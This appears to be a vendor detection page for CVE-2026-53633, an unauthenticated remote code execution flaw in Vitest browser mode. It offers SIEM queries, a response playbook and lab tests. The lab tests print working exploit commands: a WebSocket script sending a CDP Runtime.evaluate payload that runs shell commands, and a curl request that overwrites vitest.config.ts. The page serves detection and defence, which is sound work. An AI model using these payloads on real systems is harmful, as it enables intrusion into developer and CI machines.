CVE-2026-53633: Vitest Browser Mode API RCE via CDP Proxy and Config Overwrite
CVE-2026-53633 is a critical (CVSS 9.8) remote code execution vulnerability in @vitest/browser and vite-plus packages. The browser mode API is exposed without adequate authorization controls (CWE-749, CWE-862), allowing unauthenticated attackers to proxy Chrome DevTools Protocol (CDP) commands and overwrite configuration files. This can lead to arbitrary code execution on the host running Vitest in browser mode. Affected versions include @vitest/browser >= 3.0.0 <= 3.2.4, >= 4.0.0 <= 4.1.7, >= 5.0.0-beta.0 <= 5.0.0-beta.3, and vite-plus <= 0.1.23. A public PoC exists.
Vulnerability Intelligence
Public PoCAffected Software
- Vendor
- npm
- Product
- @vitest/browser, vite-plus
- Versions
- >= 5.0.0-beta.0, <= 5.0.0-beta.3, >= 4.0.0, <= 4.1.7, >= 3.0.0, <= 3.2.4, <= 0.1.23
Timeline
- Disclosed
- June 15, 2026
What is CVE-2026-53633 CVE-2026-53633: Vitest Browser Mode API RCE via CDP Proxy and Config Overwrite?
CVE-2026-53633: Vitest Browser Mode API RCE via CDP Proxy and Config Overwrite (CVE-2026-53633) maps to the Initial Access and Execution and Persistence and Privilege Escalation tactics — the adversary is trying to get into your network in MITRE ATT&CK.
This page provides production-ready detection logic for CVE-2026-53633: Vitest Browser Mode API RCE via CDP Proxy and Config Overwrite, covering the data sources and telemetry it touches: Microsoft Defender for Endpoint, Azure Network Security Groups, Microsoft Sentinel Network Logs. The queries below are rated critical severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.
MITRE ATT&CK
let VitestPorts = dynamic([51204, 51205, 5173, 5174, 4173]);
let SuspiciousCDPPaths = dynamic(["/json", "/__vitest_api__", "/__vitest__", "/cdp", "/ws"]);
union DeviceNetworkEvents, CommonSecurityLog
| where TimeGenerated >= ago(24h)
| where (DeviceAction !in ("blocked", "deny") or isempty(DeviceAction))
| where (
(RemotePort in (VitestPorts)) or
(DestinationPort in (VitestPorts))
)
| extend RequestPath = tostring(parse_url(RequestURL)["Path"])
| where RequestPath has_any (SuspiciousCDPPaths) or RequestURL has_any (SuspiciousCDPPaths)
| extend IsExternal = ipv4_is_private(RemoteIP) == false or ipv4_is_private(SourceIP) == false
| extend SuspiciousCDPCommand = RequestURL has_any ("Runtime.evaluate", "Page.navigate", "Target.attachToTarget", "IO.read")
| where IsExternal or SuspiciousCDPCommand
| project TimeGenerated, DeviceName, RemoteIP, DestinationIP, RemotePort, DestinationPort, RequestURL, RequestPath, IsExternal, SuspiciousCDPCommand
| summarize Count=count(), FirstSeen=min(TimeGenerated), LastSeen=max(TimeGenerated), Paths=make_set(RequestPath, 20) by DeviceName, RemoteIP, DestinationIP
| where Count >= 1
| extend RiskScore = iif(SuspiciousCDPCommand == true or IsExternal == true, "High", "Medium") Detects network connections to Vitest browser mode default ports from external IPs or containing suspicious Chrome DevTools Protocol (CDP) API paths indicative of CVE-2026-53633 exploitation attempts.
Data Sources
Required Tables
False Positives
- Legitimate internal developer machines running Vitest in browser mode for local testing
- CI/CD pipelines that run Vitest browser mode tests on internal networks with multiple test runners
- Security research environments deliberately exposing Vitest APIs for testing
Sigma rule & cross-platform mapping
The detection logic for CVE-2026-53633: Vitest Browser Mode API RCE via CDP Proxy and Config Overwrite (CVE-2026-53633) above is provided in a vendor-neutral
form so you can deploy it on any SIEM. The same logic is shipped here as native
KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic (Elastic Security (EQL)), QRadar (IBM QRadar (AQL)), Sumo (Sumo Logic CSE), YARA-L (Google Chronicle / SecOps), LogScale (CrowdStrike LogScale (CQL)) queries. In Sigma terms, this detection targets the
following logsource:
logsource:
category: network_connection
product: windows Browse the community-maintained Sigma rules for this technique:
Platform-specific guides for CVE-2026-53633
Testing Methodology
Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1Vitest Browser Mode CDP Discovery via /json Endpoint
Expected signal: HTTP GET requests to /json and /__vitest_api__/ on ports 51204 or 5173 from an external source IP visible in web server or proxy logs
- Test 2CDP Runtime.evaluate Arbitrary JavaScript Execution via Vitest Browser API
Expected signal: WebSocket upgrade request to /devtools/page/<id> followed by CDP Runtime.evaluate method in request payload visible in network capture
- Test 3Vitest Config File Overwrite via Exposed API
Expected signal: HTTP POST to /__vitest_api__ with writeFile method in request body; filesystem audit log showing vitest.config.ts modification timestamp updated outside normal developer hours
Response Playbook
Triage
- Identify the source IP and destination host of the suspicious request; determine if the destination is a developer workstation, CI runner, or production-adjacent system running Vitest in browser mode
- Inspect the HTTP request path and query parameters for CDP command patterns (Runtime.evaluate, Page.navigate, Target.attachToTarget) or config file paths (.env, vitest.config.*, vite.config.*) to assess exploitation stage
- Check the @vitest/browser and vite-plus package versions installed on the affected host using 'npm ls @vitest/browser' and 'npm ls vite-plus' to confirm whether a vulnerable version is present
- Review process ancestry on the affected host: determine if node processes spawned child processes (shell, interpreter) following the suspicious network activity, which would indicate successful RCE
Containment
- Immediately block external network access to Vitest browser mode ports (default 51204, 5173, 5174, 4173) via firewall rules or security group modification; Vitest browser mode should never be reachable from untrusted networks
- If RCE is confirmed or suspected, isolate the affected host from the network and escalate to incident response; terminate all Vitest and Node.js processes on the host pending investigation
Evidence Collection
- Collect web server or reverse proxy access logs for the affected Vitest port covering the 48 hours preceding detection, filtering for requests to /__vitest_api__/, /cdp, /json, and WebSocket upgrade requests
- Capture the filesystem state of the project directory on the affected host, specifically vitest.config.*, vite.config.*, .env files, and node_modules/@vitest/browser/, to identify any unauthorised config overwrites
Escalation Criteria
- ! Escalate immediately if any Node.js or shell child processes were spawned from the Vitest server process following external network activity — this confirms RCE and requires full incident response activation
- ! Escalate if config file modification timestamps correlate with the suspicious network requests, indicating successful write-access exploitation of the vulnerability
Investigation Guide
Forensic Artifacts
- >
HTTP access logs showing requests to /__vitest_api__/ or /__vitest__/ endpoints from non-localhost IPs - >
Modified timestamps on vitest.config.ts, vite.config.ts, or .env files that do not correspond to developer commits - >
node_modules/@vitest/browser/package.json — inspect version field to confirm vulnerable release - >
Process creation events showing node spawning sh, bash, cmd.exe, or powershell.exe during or after suspicious network activity
Tuning Guidance
Reduce false positives by allowlisting known CI/CD runner IPs and developer VPN egress ranges from the external IP checks. Scope port-based detections to assets tagged as development or test infrastructure rather than production hosts. If Vitest is used in containerised CI only, consider adding container orchestration network CIDRs to the exclusion list. For highest-fidelity detection, combine the network-layer queries with process-level telemetry confirming a vulnerable @vitest/browser version is loaded.
Hunting Queries
Hunt for Node.js processes running Vitest in browser mode bound to all interfaces (0.0.0.0) or on known Vitest ports, which creates the attack surface for CVE-2026-53633 exploitation
DeviceProcessEvents
| where TimeGenerated >= ago(7d)
| where FileName in ("node", "node.exe")
| where ProcessCommandLine contains "vitest" and ProcessCommandLine contains "--browser"
| extend ParentIsShell = ParentProcessName in ("bash", "sh", "zsh", "cmd.exe", "powershell.exe", "pwsh.exe")
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine, ParentProcessName, ParentCommandLine, ParentIsShell
| where ParentIsShell or ProcessCommandLine contains "--port 0" or ProcessCommandLine contains "--host 0.0.0.0" index=endpoint sourcetype=crowdstrike:events:sensor earliest=-7d
| where event_simpleName="ProcessRollup2"
| where ImageFileName LIKE "%node%"
| where CommandLine LIKE "%vitest%" AND CommandLine LIKE "%browser%"
| eval bound_all_interfaces=if(match(CommandLine, "host.{0,10}0\.0\.0\.0"), 1, 0)
| eval explicit_port=if(match(CommandLine, "port.{0,10}(51204|5173|5174|4173)"), 1, 0)
| where bound_all_interfaces=1 OR explicit_port=1
| table _time, ComputerName, UserName, CommandLine, ParentImageFileName Atomic Red Team Tests
Simulates an attacker discovering exposed Vitest browser mode CDP by querying the /json endpoint, which lists available debugging targets without authentication. This is the reconnaissance phase of CVE-2026-53633 exploitation.
Command
# Lab only — requires Vitest >= 3.0.0 <= 3.2.4 running in browser mode
curl -s http://TARGET_HOST:51204/json | python3 -m json.tool
# Also check:
curl -s http://TARGET_HOST:51204/json/version
curl -s http://TARGET_HOST:5173/__vitest_api__/ Cleanup
No cleanup required — read-only reconnaissance request Expected Telemetry
HTTP GET requests to /json and /__vitest_api__/ on ports 51204 or 5173 from an external source IP visible in web server or proxy logs
Expected Detection
Alert triggered on network detection rules matching Vitest port + CDP discovery path combination
Exploits the unauthenticated CDP proxy in Vitest browser mode to evaluate arbitrary JavaScript in the browser context, demonstrating the RCE primitive enabled by CVE-2026-53633.
Command
# Lab only — requires vulnerable @vitest/browser running with --browser flag
# Step 1: Get target ID
TARGET_ID=$(curl -s http://TARGET_HOST:51204/json | python3 -c "import sys,json; print(json.load(sys.stdin)[0]['id'])")
# Step 2: Open WebSocket and send CDP command
python3 -c "
import websocket, json, sys
ws = websocket.create_connection('ws://TARGET_HOST:51204/devtools/page/' + sys.argv[1])
ws.send(json.dumps({'id':1,'method':'Runtime.evaluate','params':{'expression':'require(\"child_process\").execSync(\"id\").toString()','returnByValue':True}}))
print(ws.recv())
" "$TARGET_ID" Cleanup
Close WebSocket connection; no persistent changes to target Expected Telemetry
WebSocket upgrade request to /devtools/page/<id> followed by CDP Runtime.evaluate method in request payload visible in network capture
Expected Detection
EQL sequence rule fires on discovery followed by CDP command; CrowdStrike CQL correlates Node.js process network activity
Demonstrates the config file overwrite vector of CVE-2026-53633 by sending a crafted request to the Vitest browser mode API to write a malicious vitest.config.ts, enabling persistence or further exploitation.
Command
# Lab only — requires vulnerable @vitest/browser running
# Overwrite vitest config via API (exact path depends on Vitest version internals)
curl -s -X POST http://TARGET_HOST:5173/__vitest_api__ \
-H 'Content-Type: application/json' \
-d '{"method":"writeFile","params":{"path":"vitest.config.ts","content":"import {defineConfig} from \"vitest/config\"; export default defineConfig({test:{setupFiles:[\"/tmp/malicious.ts\"]}})"}}' Cleanup
Restore original vitest.config.ts from version control: git checkout vitest.config.ts Expected Telemetry
HTTP POST to /__vitest_api__ with writeFile method in request body; filesystem audit log showing vitest.config.ts modification timestamp updated outside normal developer hours
Expected Detection
Sumo Logic and Splunk queries fire on config file path in URI; file integrity monitoring alert on vitest.config.ts modification